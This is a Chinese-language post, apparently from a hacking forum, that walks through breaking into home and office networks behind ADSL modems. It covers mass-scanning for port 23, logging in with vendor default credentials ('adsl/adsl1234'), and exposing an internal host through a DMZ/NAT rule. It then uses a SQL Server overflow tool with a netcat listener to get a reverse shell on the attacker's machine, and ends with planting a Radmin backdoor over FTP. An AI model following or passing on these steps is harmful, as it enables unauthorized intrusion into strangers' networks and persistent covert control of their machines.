也許看爛了網(wǎng)上已有的常規(guī)黑客攻擊手段，對一些陳舊的入侵手法早已厭煩，近來我對ADSL MODEM的路由功能產(chǎn)生了濃厚的興趣，經(jīng)過一番努力，我終于找到了穿透ADSL路由入侵內(nèi)網(wǎng)的方法，在這里和各位一起分享我的心得。 一.掃描 現(xiàn)在很多ADSL MODEM都是通過80、23、21三個端口來管理，但80、21端口有很多服務(wù)器都有打開，沒什么特征性，于是我選擇了23端口。打開我的至愛：SUPPERSCAN，填上我所在地區(qū)的IP段，（跨多幾段都沒關(guān)系，反正SUPPERSCAN的速度就是快）眨眼間，結(jié)果出來了。開23的主機還真不少，我挑了幾臺出來，在瀏覽器那里輸入IP：218.xxx.xxx.xxx，OK。登陸對話框出來了，輸入USER：ADSL pass:adsl1234（因為我這里的adsl modem一般是華碩的，缺省是adsl adsl1234），好了，一矢中的，現(xiàn)在我就是上帝。 二.映射 入侵已經(jīng)成功了一半，要進一步入侵內(nèi)網(wǎng)，我門要進行端口映射，但是我連內(nèi)網(wǎng)的拓撲都不知道（更不用說內(nèi)網(wǎng)主機的端口開放情況了）又怎么映射呢？在此，我選擇了猜測。一般來說，MODEM的內(nèi)網(wǎng)IP缺省是192.168.1.1，而大多數(shù)就把自己主機的IP設(shè)成192.168.1.2。因此我們只要試試把192.168.1.2的端口映射出來就行了（但如果使用了dhcp就麻煩了）但是192.168.1.2到底開放了什么端口，我們根本就不知道啊。呵呵，既然不知道，那么我就把他整臺主機透明地映射到外網(wǎng)。具體做法如下：進入NAT選項---添加NAT規(guī)則---BAMID---填入主機IP：192.168.1.2，到此192.168.1.2已經(jīng)透明地映射到192.168.1.1上，我們訪問ADSL MODEM就等于訪問主機192.168.1.2了。 三.檢測漏洞 現(xiàn)在我們再請出SUPPERSCAN對218.xxx.xxx.xxx進行掃描，呵，看到?jīng)]有？掃描結(jié)果已經(jīng)不同了，開放的端口是139、1433等，剛才只是開放了80、23、21而已（也就是說我們的映射已經(jīng)成功了）該是X-SCAN出手了，用它來掃弱口令最好不過了，但掃描的結(jié)果令人失望，一個弱口令也沒有，看來管理員還不算低啊。 四.溢出 既然沒有弱口令，也沒開80，那只好從逸出方面著手了，但沒開80、21也就webdav .sevr-u的溢出沒戲了，很自然，我向?qū)Я薘PC溢出，但實踐證明RPC溢出也是不行的，LSASS溢出也不行 五.募然回首，那人卻在，燈火闌珊處 看來這個管理員還是比較負責(zé)的，該打的補丁都打上了。這時侯，我的目光轉(zhuǎn)移到1433上了（嘿，不知道他打了SQL補丁沒有？，心動不如行動，現(xiàn)在只好死馬當(dāng)活馬醫(yī)了，于是：
nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 這樣就成功得到一個shell了。
六.設(shè)置后門 到這里，我們的入侵已經(jīng)成功了，余下的是掃尾留后門，至于后門，我一般都是用FTP上傳RADMIN上去的，呵呵，這里不詳談了，相信各位都知道。